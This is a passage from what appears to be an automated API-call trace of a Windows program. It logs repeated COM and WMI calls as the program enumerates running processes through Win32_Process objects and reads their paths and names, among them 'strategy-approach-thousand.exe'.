[6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518f68) returned 0x0 [0264.593] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.593] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.594] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.594] IUnknown:AddRef (This=0x5518f68) returned 0x3 [0264.594] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.594] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.594] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518f6c) returned 0x0 [0264.596] IMarshal:GetUnmarshalClass (in: This=0x5518f6c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.596] IUnknown:Release (This=0x5518f6c) returned 0x3 [0264.596] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.596] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.596] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.596] IUnknown:Release (This=0x5518f68) returned 0x2 [0264.596] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.596] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.597] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518f68) returned 0x0 [0264.597] IUnknown:AddRef (This=0x5518f68) returned 0x4 [0264.597] IUnknown:Release (This=0x5518f68) returned 0x3 [0264.597] IUnknown:Release (This=0x5518f68) returned 0x2 [0264.597] CoTaskMemFree (pv=0x54ba1c8) [0264.597] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.597] IUnknown:AddRef (This=0x5518f68) returned 0x3 [0264.597] IWbemClassObject:Get (in: This=0x5518f68, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.597] IWbemClassObject:Get (in: This=0x5518f68, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"800\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.597] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"800\"") returned 0x5c [0264.597] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"800\"") returned 0x5c [0264.597] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.597] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.597] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.597] IUnknown:Release (This=0x601a94) returned 0x1 [0264.598] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514dc8) returned 0x0 [0264.599] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514dc8) returned 0x0 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IUnknown:AddRef (This=0x5514dc8) returned 0x3 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550eea8) returned 0x0 [0264.599] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550eea8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.599] WbemDefPath:IUnknown:Release (This=0x550eea8) returned 0x3 [0264.599] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.599] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.599] WbemDefPath:IUnknown:Release (This=0x5514dc8) returned 0x2 [0264.599] WbemDefPath:IUnknown:Release (This=0x5514dc8) returned 0x1 [0264.600] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.600] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514dc8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514dc8) returned 0x0 [0264.600] WbemDefPath:IUnknown:AddRef (This=0x5514dc8) returned 0x3 [0264.600] WbemDefPath:IUnknown:Release (This=0x5514dc8) returned 0x2 [0264.600] WbemDefPath:IWbemPath:SetText (This=0x5514dc8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"800\"") returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.600] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.601] IWbemClassObject:Get (in: This=0x5518f68, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cd508*=0, plFlavor=0x23cd50c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="strategy-approach-thousand.exe", varVal2=0x0), pType=0x23cd508*=8, plFlavor=0x23cd50c*=0) returned 0x0 [0264.601] SysStringByteLen (bstr="strategy-approach-thousand.exe") returned 0x3c [0264.601] SysStringByteLen (bstr="strategy-approach-thousand.exe") returned 0x3c [0264.601] IWbemClassObject:Get (in: This=0x5518f68, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cd508*=8, plFlavor=0x23cd50c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="strategy-approach-thousand.exe", varVal2=0x0), pType=0x23cd508*=8, plFlavor=0x23cd50c*=0) returned 0x0 [0264.601] SysStringByteLen (bstr="strategy-approach-thousand.exe") returned 0x3c [0264.601] SysStringByteLen (bstr="strategy-approach-thousand.exe") returned 0x3c [0264.601] CoTaskMemAlloc (cb=0x4) returned 0x54ba2e8 [0264.601] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2e8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2e8*=0x55185d8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55185d8) returned 0x0 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.602] IUnknown:AddRef (This=0x55185d8) returned 0x3 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.602] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55185dc) returned 0x0 [0264.603] IMarshal:GetUnmarshalClass (in: This=0x55185dc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.603] IUnknown:Release (This=0x55185dc) returned 0x3 [0264.603] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.603] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.603] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.603] IUnknown:Release (This=0x55185d8) returned 0x2 [0264.603] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.603] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.603] IUnknown:QueryInterface (in: This=0x55185d8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55185d8) returned 0x0 [0264.603] IUnknown:AddRef (This=0x55185d8) returned 0x4 [0264.603] IUnknown:Release (This=0x55185d8) returned 0x3 [0264.603] IUnknown:Release (This=0x55185d8) returned 0x2 [0264.603] CoTaskMemFree (pv=0x54ba2e8) [0264.603] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.603] IUnknown:AddRef (This=0x55185d8) returned 0x3 [0264.603] IWbemClassObject:Get (in: This=0x55185d8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.603] IWbemClassObject:Get (in: This=0x55185d8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"864\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.603] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"864\"") returned 0x5c [0264.604] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"864\"") returned 0x5c [0264.604] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.604] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.604] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.604] IUnknown:Release (This=0x601a94) returned 0x1 [0264.605] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba1d8) returned 0x0 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba1d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.605] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba1d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514e38) returned 0x0 [0264.605] WbemDefPath:IUnknown:Release (This=0x54ba1d8) returned 0x0 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514e38) returned 0x0 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.605] WbemDefPath:IUnknown:AddRef (This=0x5514e38) returned 0x3 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550e3b0) returned 0x0 [0264.605] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550e3b0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.605] WbemDefPath:IUnknown:Release (This=0x550e3b0) returned 0x3 [0264.605] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.606] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.606] WbemDefPath:IUnknown:Release (This=0x5514e38) returned 0x2 [0264.606] WbemDefPath:IUnknown:Release (This=0x5514e38) returned 0x1 [0264.606] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.606] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514e38, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514e38) returned 0x0 [0264.606] WbemDefPath:IUnknown:AddRef (This=0x5514e38) returned 0x3 [0264.606] WbemDefPath:IUnknown:Release (This=0x5514e38) returned 0x2 [0264.606] WbemDefPath:IWbemPath:SetText (This=0x5514e38, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"864\"") returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, 